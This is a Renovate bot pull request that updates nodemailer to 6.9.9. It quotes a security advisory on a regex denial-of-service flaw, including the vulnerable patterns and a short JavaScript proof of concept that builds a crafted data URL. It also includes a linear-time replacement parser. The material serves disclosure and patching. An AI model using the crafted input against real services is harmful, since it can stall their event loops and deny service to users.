
fix(deps): update dependency nodemailer to v6.9.9 [security]#584

Open
renovate[bot] wants to merge 1 commit into main from renovate/npm-nodemailer-vulnerability


@renovate renovate bot commented Feb 1, 2024

This PR contains the following updates:

Package              Change          Age   Confidence
nodemailer (source)  6.9.4 -> 6.9.9  age   confidence

GitHub Vulnerability Alerts

GHSA-9h6g-pr28-7cqp

Summary

A ReDoS vulnerability occurs when nodemailer tries to parse img files with the parameter attachDataUrls set, causing the event loop to get stuck.
Another flaw was found when nodemailer tries to parse attachments with an embedded file, causing the event loop to get stuck.

Details

Regex: /^data:((?:[^;]*;)*(?:[^,]*)),(.*)$/

Path: compile -> getAttachments -> _processDataUrl

Regex: /(<img\b[^>]* src\s*=[\s"']*)(data:([^;]+);[^"'>\s]+)/

Path: _convertDataImages

PoC

https://gist.github.com/francoatmega/890dd5053375333e40c6fdbcc8c58df6
https://gist.github.com/francoatmega/9aab042b0b24968d7b7039818e8b2698

async function exploit() {
   const MailComposer = require("nodemailer/lib/mail-composer");
   const MailComposerObject = new MailComposer();

   // Create a malicious data URL that will cause excessive backtracking
   // This data URL is crafted to have a long sequence of characters that will cause the regex to backtrack
   const maliciousDataUrl = 'data:image/png;base64,' + 'A;B;C;D;E;F;G;H;I;J;K;L;M;N;O;P;Q;R;S;T;U;V;W;X;Y;Z;'.repeat(1000) + '==';

   // Call the vulnerable method with the crafted input
   const result = await MailComposerObject._processDataUrl({ path: maliciousDataUrl });
}

await exploit();

Impact

ReDoS causes the event loop to get stuck; a specially crafted evil email can cause this problem.

Severity
  • CVSS Score: 5.3 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Release Notes

nodemailer/nodemailer (nodemailer)

v6.9.9


Bug Fixes
  • security: Fix issues described in GHSA-9h6g-pr28-7cqp. Do not use eternal matching pattern if only a few occurrences are expected (dd8f5e8)
  • tests: Use native node test runner, added code coverage support, removed grunt (#1604) (be45c1b)

v6.9.8


Bug Fixes
  • punycode: do not use native punycode module (b4d0e0c)

v6.9.7


Bug Fixes
  • customAuth: Do not require user and pass to be set for custom authentication schemes (fixes #1584) (41d482c)

v6.9.6


Bug Fixes
  • inline: Use 'inline' as the default Content Disposition value for embedded images (db32c93)
  • tests: Removed Node v12 from test matrix as it is not compatible with the test framework anymore (7fe0a60)

v6.9.5


Bug Fixes
  • license: Updated license year (da4744e)

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.



This PR was generated by Mend Renovate. View the repository job log.
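Added example, not nodemailer's code or the advisory's: the advisory's first pattern (asterisks restored) next to a linear-time data-URL parser that does the same job without a nested unbounded repetition. `parseDataUrl`, `demo`, the header-length limit and the two constructed inputs are this example's own names and values.

```javascript
'use strict';

// Pattern quoted in GHSA-9h6g-pr28-7cqp. The unbounded `(?:[^;]*;)*` followed
// by `[^,]*` means that on a payload holding many `;`-separated segments after
// the first comma, the engine unwinds one segment at a time and rescans to the
// end of the input for a comma on each step: quadratic work on attacker-
// controlled input. Kept for comparison on benign input only; do not run it
// over PATHOLOGICAL.
const VULNERABLE_DATA_URL_RE = /^data:((?:[^;]*;)*(?:[^,]*)),(.*)$/;

// Linear-time replacement: locate the first comma with indexOf, then split the
// short header on `;`. Each character is visited a bounded number of times no
// matter how many `;` the payload contains, so there is nothing to backtrack.
function parseDataUrl(url, maxHeaderLength = 256) {
  if (typeof url !== 'string' || !url.startsWith('data:')) return null;
  const comma = url.indexOf(',');
  if (comma < 0) return null;
  const header = url.slice(5, comma);
  // RFC 2397 headers carry a media type plus a few parameters; reject an
  // oversized header before doing further work (the limit is a chosen value).
  if (header.length > maxHeaderLength) return null;
  const parts = header.split(';');
  const mediaType = parts.shift() || 'text/plain';
  const params = {};
  let isBase64 = false;
  for (const p of parts) {
    if (p === 'base64') { isBase64 = true; continue; }
    const eq = p.indexOf('=');
    if (eq < 0) return null; // malformed parameter such as `;foo`
    params[p.slice(0, eq)] = p.slice(eq + 1);
  }
  return { mediaType, params, isBase64, data: url.slice(comma + 1) };
}

// Constructed inputs: a benign PNG data URL and the shape used in the PoC.
const BENIGN = 'data:image/png;charset=binary;base64,iVBORw0KGgo=';
const PATHOLOGICAL = 'data:image/png;base64,'
  + 'A;B;C;D;E;F;G;H;I;J;K;L;M;N;O;P;Q;R;S;T;U;V;W;X;Y;Z;'.repeat(1000) + '==';

// Parse the pathological input and report how long it took, in milliseconds.
function demo() {
  const t0 = process.hrtime.bigint();
  const parsed = parseDataUrl(PATHOLOGICAL);
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  return { mediaType: parsed.mediaType, isBase64: parsed.isBase64,
           dataLength: parsed.data.length, ms };
}

console.log(demo());
```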

@renovate renovate bot added the 📦 package label Feb 1, 2024

vercel bot commented Feb 1, 2024

The latest updates on your projects. Learn more about Vercel for GitHub.

Project   Deployment   Actions            Updated (UTC)
chirpy    Ready        Preview, Comment   Apr 1, 2026 7:16pm



changeset-bot bot commented Feb 1, 2024

⚠️ No Changeset found

Latest commit: b59ebe4

Merging this PR will not cause a version bump for any packages. If these changes should not result in a new version, you're good to go. If these changes should result in a version bump, you need to add a changeset.

This PR includes no changesets

When changesets are added to this PR, you'll see the packages that this PR includes changesets for and the associated semver types




relativeci bot commented Apr 1, 2025

#1455 Bundle Size — 2.56MiB (0%).

74a0fa2 (current) vs 3b6dffc main #1453 (baseline)

Warning

Bundle contains 4 duplicate packages

Bundle metrics (1 change)

Metric              Current #1455   Baseline #1453   Change
Initial JS          1.63MiB         1.63MiB          no change
Initial CSS         89.92KiB        89.92KiB         no change
Cache Invalidation  0.34%           65.38%           change
Chunks              60              60               no change
Assets              80              80               no change
Modules             1817            1817             no change
Duplicate Modules   254             254              no change
Duplicate Code      5.85%           5.85%            no change
Packages            151             151              no change
Duplicate Packages  3               3                no change

Bundle size by type (no changes)

Type     Current #1455   Baseline #1453
JS       2.24MiB         2.24MiB
Fonts    213.87KiB       213.87KiB
CSS      89.92KiB        89.92KiB
Other    15.35KiB        15.35KiB
IMG      1.73KiB         1.73KiB


@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 18db5b7 to 3d57e51 on June 15, 2025 00:31
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 3d57e51 to 5f167c7 on August 10, 2025 13:55
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 5f167c7 to 26d1e12 on August 19, 2025 19:34
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 26d1e12 to c159f76 on October 7, 2025 18:29
@renovate renovate bot changed the title from "fix(deps): update dependency nodemailer to v6.9.9 [security]" to "fix(deps): update dependency nodemailer to v7 [security]" on Oct 7, 2025
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from c159f76 to f4dcaf0 on October 16, 2025 02:05
@renovate renovate bot changed the title from "fix(deps): update dependency nodemailer to v7 [security]" to "fix(deps): update dependency nodemailer to v6.9.9 [security]" on Oct 16, 2025
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from f4dcaf0 to 348492a on November 10, 2025 15:00
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 348492a to 1b7bd66 on December 31, 2025 17:16
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 1b7bd66 to 2605553 on January 19, 2026 14:41
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 2605553 to 1d89879 on February 2, 2026 20:38
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 1d89879 to 0da27f2 on February 12, 2026 11:16
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 0da27f2 to 91d029e on March 5, 2026 14:03
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 91d029e to c94007f on March 13, 2026 19:08
@renovate renovate bot changed the title from "fix(deps): update dependency nodemailer to v6.9.9 [security]" to "fix(deps): update dependency nodemailer to v6.9.9 [security] - autoclosed" on Mar 27, 2026
@renovate renovate bot closed this on Mar 27, 2026
@renovate renovate bot deleted the renovate/npm-nodemailer-vulnerability branch on March 27, 2026 01:16
@renovate renovate bot changed the title from "fix(deps): update dependency nodemailer to v6.9.9 [security] - autoclosed" to "fix(deps): update dependency nodemailer to v8 [security]" on Mar 27, 2026
@renovate renovate bot reopened this on Mar 27, 2026
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch 2 times, most recently from c94007f to 0bfd02e on March 27, 2026 04:50
@renovate renovate bot changed the title from "fix(deps): update dependency nodemailer to v8 [security]" to "fix(deps): update dependency nodemailer to v6.9.9 [security]" on Mar 30, 2026
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 0bfd02e to 56d24f1 on March 30, 2026 18:16
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 56d24f1 to b59ebe4 on April 1, 2026 19:15